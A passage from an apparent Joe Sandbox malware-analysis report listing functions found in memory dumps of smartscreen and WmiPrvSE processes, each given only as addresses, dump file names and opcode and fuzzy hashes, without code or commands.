                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: 3d46c1e4e994ab30134f43e8b85ff06eb873397390d080b3eacdeda5102c0f03
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: D3D0A73166EA8E8FEB02B778DC5A4547FA0EF1F215FDA10E2D008CB5B2D5055999C701
                                                                                                                            Function 00007FFD9B8C2960 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B8CC388 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction ID: 0b2525b4c0029e54c7d6c493c828e9f462a94cf6b4334259cca612d031d47263
                                                                                                                            • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction Fuzzy Hash: 80D02230B51C040FC70CB73888988303390EB6E20778100A9D00AC72B1D92AEC88C780
                                                                                                                            Function 00007FFD9B8C79D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction ID: 4a5729e1c0f3bf18bdd2aeb6437c32f9e28861fa7abaf30de18ef50405372f16
                                                                                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction Fuzzy Hash: 03D02230B908040FC71CB73888588303390EB6E207B8100A9D00AC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B8C848C Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction ID: dd2fa252bd044f90bfe0c48d71cca4bcdfc65ff6de01196c9be09c8a8df5d479
                                                                                                                            • Opcode Fuzzy Hash: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction Fuzzy Hash: 56D0A73194B5844FCB0AAB3584A8C707F50DF5A20474940EDC04A8F1B2D9259949C700
                                                                                                                            Function 00007FFD9B891270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: 37d56fc8bf9c5039ec7b7fcad5045d6e65fb4e6495ea3a13e890c7ad575b7a3f
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: BCC0123461180C8FCE48EB28C894D14B7A0FB1D308B960094E40DCB2B1E62AECC2CB40
                                                                                                                            Function 00007FFD9B8A4CA2 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction ID: 9a838bcee849822155eb1aab13ca98329973e27e25f0df731afb868c8a01095f
                                                                                                                            • Opcode Fuzzy Hash: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction Fuzzy Hash: 25D0C731B0950D8BDE59EB8494607797251EF4C344F150479D81E831D7DE2569538611
                                                                                                                            Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: 273191246111428e40a431a7a54f12b9d089d306f6e8a9bf204ffb7757e5edd1
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: C4C04C06F7B65F01FC3A73EE98660ACA9405FDDE14FD70172D54D400E19D4D22D5015A
                                                                                                                            Function 00007FFD9B892A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7c4fe37dc82f1ea4df1b60d52e6853e3573d1e6ec28216039b842f7fb5be9b87
                                                                                                                            • Instruction ID: 195898bece0eb06f55a650c343e64fbeb03d7c7216dfd1e68a1c8dc7070d0c60
                                                                                                                            • Opcode Fuzzy Hash: 7c4fe37dc82f1ea4df1b60d52e6853e3573d1e6ec28216039b842f7fb5be9b87
                                                                                                                            • Instruction Fuzzy Hash: 80C04C11F1C81A16F75A7754942167E48539B44648F950475E41EE73CECD5D6E1202C7
                                                                                                                            Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: b4fc1ea5d6783b844f0b641cbd262a33b41a6ab9518781fdcb408edd7a7f3afa
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: ECB00205D7744F01EC7C33FA195616978945B4D514FD61170D84D50195984D16951256

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 253458a10e497b6783f913fce76b30542d0bb61413d7d333b974f08ca032dd70
                                                                                                                            • Instruction ID: e6b196baa473aecd27b0473277671d06a4999512242d139f993a0ee3a99db811
                                                                                                                            • Opcode Fuzzy Hash: 253458a10e497b6783f913fce76b30542d0bb61413d7d333b974f08ca032dd70
                                                                                                                            • Instruction Fuzzy Hash: 8B41D087B1957685E31F33FC79299ED9B84CF8127DB0846B7E15E8A0C7AC88608293D5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B8A0D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 12c583e4eb3e0b37af87cc8c94152e3dcccf75eccbce222cab861decdab6c169
                                                                                                                            • Instruction ID: 0c785b4e328a432d06c0fcac4ef8a4c10a171b9dd0f14120448dc40bcfabe505
                                                                                                                            • Opcode Fuzzy Hash: 12c583e4eb3e0b37af87cc8c94152e3dcccf75eccbce222cab861decdab6c169
                                                                                                                            • Instruction Fuzzy Hash: 6891F471A19A8D8FEB99EB6888657A97FE1FF99314F4001BBD04DD32E2DB782411C701
                                                                                                                            Function 00007FFD9B8D15A9 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 85c91f5ad7193c1ebaf98fda6635a70a498f71c8d1a03949869f0e6afadfb1ff
                                                                                                                            • Instruction ID: 1d732d8dc34365686f11bbfac9fe27c82cfdf1aa8c7d2a7e89b563b0402cb05f
                                                                                                                            • Opcode Fuzzy Hash: 85c91f5ad7193c1ebaf98fda6635a70a498f71c8d1a03949869f0e6afadfb1ff
                                                                                                                            • Instruction Fuzzy Hash: 3C11C671A0F6894FDB15AB788869498BFB0EF5A300F0642EBD04ACB1A3ED299945C741
                                                                                                                            Function 00007FFD9B8DB089 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 270c655ade8c41a48ec8c09ab02377e0019eceadba05352cf1249c358c7f4dd3
                                                                                                                            • Instruction ID: 72a8a3520cd86fd5879b428675c29c93012af4e2130465eb946eb2c006f465fa
                                                                                                                            • Opcode Fuzzy Hash: 270c655ade8c41a48ec8c09ab02377e0019eceadba05352cf1249c358c7f4dd3
                                                                                                                            • Instruction Fuzzy Hash: 0DE0656190B7854FCB15AA3484698547FA0EF6760174A52EFC045CF1A3EA2DD8C6C701
                                                                                                                            Function 00007FFD9B8B3F09 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 873b77a808443fb1a9fed629c02c75346135b9cf76f0d497f646e20ac97373f4
                                                                                                                            • Instruction ID: 93c4fc135faf49ffcc14baa2fa0e39c33b1cec2489ed69bcafaad528fb8aafa3
                                                                                                                            • Opcode Fuzzy Hash: 873b77a808443fb1a9fed629c02c75346135b9cf76f0d497f646e20ac97373f4
                                                                                                                            • Instruction Fuzzy Hash: 51F0E531A0F3C04FCB16AA3488648447FB0EF6720074A52EEC045CF1A3DA2CD886C710
                                                                                                                            Function 00007FFD9B8DAFB9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 9cf620831439448f85a6df8655cd548ef7c3abc58249074df2b4aaf4415ec1d6
                                                                                                                            • Instruction ID: 5f04116de9c20bd4d97326ff61ce4ba1004bd5c037592b66e5e53673f9550fb6
                                                                                                                            • Opcode Fuzzy Hash: 9cf620831439448f85a6df8655cd548ef7c3abc58249074df2b4aaf4415ec1d6
                                                                                                                            • Instruction Fuzzy Hash: 52E06D6160B7844FCB1AAA358869854BFA0EF6760174A52EFC045CB1A3EA2DD88AC701
                                                                                                                            Function 00007FFD9B8D3B79 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 4a8e4a8f597a4a3e6813092c966bfb03a571af712c5925d52cb04d1b18ab1b3c
                                                                                                                            • Instruction ID: ce1df7c275c8bd1034a17ce4d57469ea7640a527a3b325702e937a8f6b7695e2
                                                                                                                            • Opcode Fuzzy Hash: 4a8e4a8f597a4a3e6813092c966bfb03a571af712c5925d52cb04d1b18ab1b3c
                                                                                                                            • Instruction Fuzzy Hash: 56E06D7160E7C44FC71AAA388869454BFA0EF6721174A42EFC045CF1A3EA2D8889C701
                                                                                                                            Function 00007FFD9B8D28B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 91a95915b5e75e7a2b502dd5daa15a8916a49cafdacfe1b1686e0cfd496134bd
                                                                                                                            • Instruction ID: 2ecc8645f13b92adb65702f1859f0667e2d99e8eee0769620b3917e2473a6cb5
                                                                                                                            • Opcode Fuzzy Hash: 91a95915b5e75e7a2b502dd5daa15a8916a49cafdacfe1b1686e0cfd496134bd
                                                                                                                            • Instruction Fuzzy Hash: 8DE06D2164E3C04FCB16AB3488688547F60EE6720178A52EFC046CF1A3EA2D898AC701
                                                                                                                            Function 00007FFD9B8D8D09 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 0fca2ecdda84ecfb6ae370d3990d8e5c216c76da1751e9b0afab1592ca81ade9
                                                                                                                            • Instruction ID: 9d09eec114bf921513aad1e57915617d5c34e3351fa5e47436403cfbad848b74
                                                                                                                            • Opcode Fuzzy Hash: 0fca2ecdda84ecfb6ae370d3990d8e5c216c76da1751e9b0afab1592ca81ade9
                                                                                                                            • Instruction Fuzzy Hash: 48E0656140F3C04FCB06AB34886A8047FB0AE6B21078A81EEC085CB1B3E6298849C701
                                                                                                                            Function 00007FFD9B8DB589 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: cc71281a42aa2d982d4f45b6fb39b46ab46f0c4ae373619c58deeebc8913c8aa
                                                                                                                            • Instruction ID: c04514a695a3ae595698fb87df465e9c075ee81bb583f102b7eb394e8be90608
                                                                                                                            • Opcode Fuzzy Hash: cc71281a42aa2d982d4f45b6fb39b46ab46f0c4ae373619c58deeebc8913c8aa
                                                                                                                            • Instruction Fuzzy Hash: 96E0E56194E7D44FCB16AB74886A8457FB0AE6B31078A41EEC185CF1B3E6299849C701
                                                                                                                            Function 00007FFD9B8D2949 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: b8be5a2698170a9070047eeae4ba210949d3c8cb46c52228cfa3b58006808ee9
                                                                                                                            • Instruction ID: 41cb608798df3b55fe39cd72d5bdfc9f3b6285f755bc2b27ed2e0620fe407b8f
                                                                                                                            • Opcode Fuzzy Hash: b8be5a2698170a9070047eeae4ba210949d3c8cb46c52228cfa3b58006808ee9
                                                                                                                            • Instruction Fuzzy Hash: 39E04F7154A3C04FCB06EB7484A98443F70EE6721078B41DEC04ACF1B3E62E894AC701
                                                                                                                            Function 00007FFD9B8A08D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: db18789ded425ecb8cc2feed5f3e44a7937d8144fa9fcf4e677fe7eea5175d21
                                                                                                                            • Instruction ID: 646334c3419d143b73a2c27b110df18adab0bc0d2744d5339cd2c90967358bab
                                                                                                                            • Opcode Fuzzy Hash: db18789ded425ecb8cc2feed5f3e44a7937d8144fa9fcf4e677fe7eea5175d21
                                                                                                                            • Instruction Fuzzy Hash: 19413822B1D52D4EE719B7AC74A96FD7781EF89329F0401FBD04EC71D7ED18A8428285
                                                                                                                            Function 00007FFD9B8D2F81 Relevance: .1, Instructions: 118COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e71e3d3db7473548519e5c02c105876a7cf5eb4df4de6f5ea09089a9a0dfd381
                                                                                                                            • Instruction ID: 7199aef287f2d1d0e3163fbf74cae5c135fd82603ca74b6b5e44d1f6b5e1c20f
                                                                                                                            • Opcode Fuzzy Hash: e71e3d3db7473548519e5c02c105876a7cf5eb4df4de6f5ea09089a9a0dfd381
                                                                                                                            • Instruction Fuzzy Hash: 63312231A0DA4D8FEB68EB58C8647A937A1FBD9320F0403BBD009C72D2DD686D418781
                                                                                                                            Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e55d3f827cf5fe8160dce21961789b7f88b2e72c30c179ddd8c24086d7f4459c
                                                                                                                            • Instruction ID: 0288777b39d577a1bebd054d3fa8115ba0f223188011f66ce7d4df271f0411c4
                                                                                                                            • Opcode Fuzzy Hash: e55d3f827cf5fe8160dce21961789b7f88b2e72c30c179ddd8c24086d7f4459c
                                                                                                                            • Instruction Fuzzy Hash: D7314932B1E29DCBE726A7A898651EC7B60EF46314F0542F3D04C8B1D3DE38264687A1
                                                                                                                            Function 00007FFD9B8A0998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0062d5b43ff01239e2529bd483de96ebcba36e843d588af31f62b5163b9d51eb
                                                                                                                            • Instruction ID: 52bf887651d781212a05a27869760bd1fdcf406464f9ccd8a714e067cd3b2722
                                                                                                                            • Opcode Fuzzy Hash: 0062d5b43ff01239e2529bd483de96ebcba36e843d588af31f62b5163b9d51eb
                                                                                                                            • Instruction Fuzzy Hash: C021F920B2891D0FE798F76C547A77976C6EBDD355F4100BAE40EC33E6DD18AC428255
                                                                                                                            Function 00007FFD9B8D2D78 Relevance: .1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 034904c95c67a2392948ea9cd823fed5f0c03bfe4bc5d0a4c2f6308ea16964c9
                                                                                                                            • Instruction ID: 8d39d44ca42a7bf66462afda9d3130dbff7142a00d9583bfa01d472a2c73c96d
                                                                                                                            • Opcode Fuzzy Hash: 034904c95c67a2392948ea9cd823fed5f0c03bfe4bc5d0a4c2f6308ea16964c9
                                                                                                                            • Instruction Fuzzy Hash: 9521F921B0D95D4FE799FBD8A4B66F42291EFD8314F0503BBD40CC62E7DC1929894341
                                                                                                                            Function 00007FFD9B8A11AD Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f9f75e7cba23dc6d71fff60e465114d82da08e71fdf7d41eec07d67790e65ad2
                                                                                                                            • Instruction ID: f960be77cc22c904adb2d4d9c58530a6f05ecfd128a6b82d6c70b54f44a1a92d
                                                                                                                            • Opcode Fuzzy Hash: f9f75e7cba23dc6d71fff60e465114d82da08e71fdf7d41eec07d67790e65ad2
